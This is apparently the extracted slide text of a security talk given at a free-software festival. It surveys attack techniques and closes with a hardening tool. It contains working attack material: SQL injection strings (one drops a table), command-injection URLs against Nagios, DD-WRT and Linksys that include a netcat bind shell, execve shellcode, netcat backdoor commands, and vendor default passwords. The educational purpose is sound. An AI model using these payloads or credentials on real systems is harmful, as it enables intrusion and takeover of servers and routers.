Upload
festival-software-livre
View
3.340
Download
0
Embed Size (px)
DESCRIPTION
Serão demonstradas diversas técnicas de ataque, tais como: Injeções de codigos,brute force, backdoors, root kits, exploits e várias outras maneiras para acessar e se manter indevidamente a servidores,em contra-partida são discutidas melhores praticas para se evitar os tipos de ataques citados. (Palestra realizada no 3º Festival de Software livre em belo horizonte - FSLBH)
Citation preview
FingerPrint
Web-Bugs
Backdoors
Brute Force
ShellCode
Exploits
Sniffers
Scanners/Fuzzers
Agenda
MetaSploit
IIS SemiColon
Man-in-the-Middle
FingerPrint
The best tool for discovery operating systems, services, devices and others: NMAP (Network Mapper)
Basic commands:
nmap host (Basic)nmap –sV host (Service Versions)nmap –P0 host ( ICMP ECHO-REPLY Ignore)nmap –O host (Try to grab O.S version)nmap –f host (Firewall/IDS/IPS Evasion)
Grab informations about a target host. Ex: It's used to identify Operational System and/or Services(daemon) version number by TCP/IP response's unique characteristics.
Passive - FingerPrint
• TTL - What the operating system sets the Time To Live on the outbound packet
• Window Size - What the operating system sets the Window Size at.
• DF - Does the operating system set the Don't Fragment bit.
• TOS - Does the operating system set the Type of Service, and if so, at what.
Web Vulnerability
SQL-Injection
Cross Site (XSS)
Cross Site Request Forgery (CSRF)
CGI’s Command Injection
PHP-Injection
These vulnerabilities are initially explored through malicious browser requests compromising the target in a matter of minutes
Web Vulnerability
SQL-Injection
It occurs when the attacker can insert a series of SQL statements within a 'query' by manipulating the data entry application.
SELECT campos FROM tabela WHERE campo = '[email protected]';
Inject string: some' OR 'x'='x SELECT fields FROM table WHERE field = ‘some' OR 'x'='x';
admin'-- " or 0=0 # ' or 1=1-- hi' or 'a'='a
' or 0=0 -- or 0=0 # " or 1=1-- hi') or ('a'='a
" or 0=0 -- ' or 'x'='x or 1=1-- hi") or ("a"="a
or 0=0 -- " or "x"="x ' or a=a-- ‘);Drop table x;--
' or 0=0 # ') or ('x'='x hi" or 1=1 -- ') or ('a'='a
Web Vulnerability
CGI Command Injection
It occurs when the attacker insert a series of commands exploiting vulnerable CGI scripts
Nagios:https://www.xxx.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+%24PATH
DD-WRT http://www.xxx.com/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
Linksys –Wireless/setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1
ShellCode Introduction
#include <stdio.h>main(){
char *comando[2];comando[0]="/bin/sh";comando[1]=NULL;execve(comando[0],comando,NULL);
:}char shellcode[] ="xebx1fx5ex89x76x0ax31xc0x88x46x09x89x46x0exb0x0bx89" "xf3x8dx4ex0ax8dx56x0excdx80x31xdbx89xd8x40xcdx80xe8" "xdcxffxffxff/bin/sh";
Exploits
Kinds of Exploits:
Local: Usually, the objective of a local exploit is to elevate user's privileges on the machine as close as possible to root (uid=0) or administrator. They are written to exploit kernel bugs or suid binaries
Remote: It works over a network connection and exploit the vulnerable target without any prior access to it.
www.securityfocus.comwww.milw0rm.comwww.secunia.comwww.exploit-db.com
0Days –It works usually an unpublished exploit from a brand new found vulnerability. You can buy! $$$$$
Backdoors/RootKits
Used to maintain access to the system
We can Netcat use for this purpose nc –vv –l –p 5555nc –vv –l –p 5555 –e /bin/bashnc <ip> <port>
RootKits
The main purpose of a rootkit is to hide the attacker's presence replacing vital system binaries from target's systemExample: Hide files (with match strings) Run command when match strings Hide processes Hide open ports, and others.
Default/Weak passwords
Default passwords are set by its manufacturers/developers and were not changed after the installation/configuration.
As supplied by the system vendor and meant to be changed at installation time (Nobody do this shit)
Ex: Sw 3Com: User: securityPass: security
FireBird:User: sysdbaPass: masterkey
Weak: Passwords that are easily guessed or in a keyboard sequential Ex:123456loveHouse´s phoneBirthday Etc...
Brute Force
It consists in using random combinations of characters/numbers and symbols, wordlists and/or string generators to crack a passwordEx:
John the Ripper HydraSSH Brute Force
Brute Force
DirBuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers
Scanners/Fuzzers
There are 2 types of scanners: Specific which are written for a specific vulnerability (BSQLHacker, SQLMAP) and Generic which are written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate the potential target/vulnerabilities
Saint
W3af Nexpose Community
Sniffers
Sniffer monitors and analyzes network traffic. Some of these packetsmay contain critical information (such as logins, passwords and cool infos )WhireShark -
DoS
Denial of Service, consist of attempts to prevent valid users from using a particular feature or simply drop it
SYN FLOOD
UDP Packet Storm
DDoS
Smurf Attack
Hardening your server
HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files allowing you to get a quick overview of the security status of your system.
http://hntool.net